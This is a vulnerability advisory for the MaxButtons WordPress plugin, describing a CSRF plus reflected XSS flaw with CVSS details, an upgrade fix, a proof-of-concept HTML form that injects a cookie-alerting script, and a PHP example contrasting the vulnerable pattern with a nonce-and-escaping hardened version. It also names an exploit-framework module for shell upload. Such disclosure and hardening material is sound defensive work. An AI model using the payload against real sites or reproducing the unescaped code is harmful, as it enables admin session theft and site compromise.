Homepage

https://wordpress.org/plugins/maxbuttons/

Overview

Because includes/admin_header.php neither applies CSRF mitigation (a nonce check) nor entity-encodes the page parameter it reflects, a crafted POST request that places script in the page field is executed in the browser of the administrator who submits it, i.e. in the context of an admin user (see the proof of concept below).

CVSS Score

4.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

Versions Affected

6.18 and below

Solution

Upgrade to version 6.19 or newer

WordPress Exploit Framework Module

exploit/xss/reflected/maxbuttons_reflected_xss_shell_upload

Proof of Concept

<form action="http://[target]/wp-admin/admin.php?page=maxbuttons-controller" method="post">
  <input name="page" type="text" value="&quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;&lt;div class=&quot;">
  <input type="submit" value="Submit">
</form>
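The proof of concept above breaks out of an attribute value with `">` and then injects markup, which only works because the reflected parameter is neither escaped nor tied to a nonce. The following is an added example, not code from the MaxButtons plugin or from the advisory: a reconstruction of the vulnerable pattern the Overview describes beside a hardened version using standard WordPress APIs (check_admin_referer, wp_nonce_field, sanitize_key, esc_attr). The function names, the nonce action and field names, and the exact markup are assumptions for illustration.

```php
<?php
// Added example (not the plugin's own code). Reconstructs the pattern described in
// the advisory: a request parameter reflected into an HTML attribute without
// encoding, on an admin page that accepts a state-changing POST without a nonce.
// Function and field names below are assumptions, not the plugin's identifiers.

// --- Vulnerable pattern (what the advisory describes; do not use) ---
function mb_example_render_vulnerable() {
    // The raw POST value lands inside a double-quoted attribute. A value such as
    //   "><script>...</script><div class="
    // closes the attribute and the tag, so the rest is parsed as markup and
    // the script runs with the administrator's session.
    $page = isset( $_POST['page'] ) ? $_POST['page'] : '';
    echo '<input type="hidden" name="page" value="' . $page . '">';
}

// --- Hardened pattern ---
function mb_example_render_hardened() {
    // 1. Capability check: only administrators may reach this controller at all.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // 2. CSRF mitigation: a POST must carry a valid nonce for this action.
    //    check_admin_referer() terminates the request if the nonce is missing
    //    or invalid, so a form posted from a third-party page (as in the PoC)
    //    is rejected before any value is reflected or saved.
    if ( 'POST' === $_SERVER['REQUEST_METHOD'] ) {
        check_admin_referer( 'mb_example_controller', 'mb_example_nonce' );
    }

    // 3. Input validation: a page slug only needs [a-z0-9_-], so reduce the
    //    parameter to that character set. The PoC payload loses every quote,
    //    angle bracket and parenthesis here.
    $page = isset( $_POST['page'] ) ? sanitize_key( wp_unslash( $_POST['page'] ) ) : '';

    // 4. Output encoding: escape for the attribute context at the point of
    //    output regardless of step 3, so a future change to the validation
    //    cannot reintroduce the injection.
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=maxbuttons-controller' ) ) . '">';
    wp_nonce_field( 'mb_example_controller', 'mb_example_nonce' );
    echo '<input type="hidden" name="page" value="' . esc_attr( $page ) . '">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}
```

In the hardened version the nonce check alone already defeats the cross-site form in the proof of concept, because the attacker's page cannot obtain a nonce bound to the victim's session; the validation and attribute escaping are the second layer that removes the XSS even for a request that does carry a valid nonce. Upgrading to 6.19 or newer, as the Solution section states, is the actual fix for deployed sites.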

WPVDB-ID

8831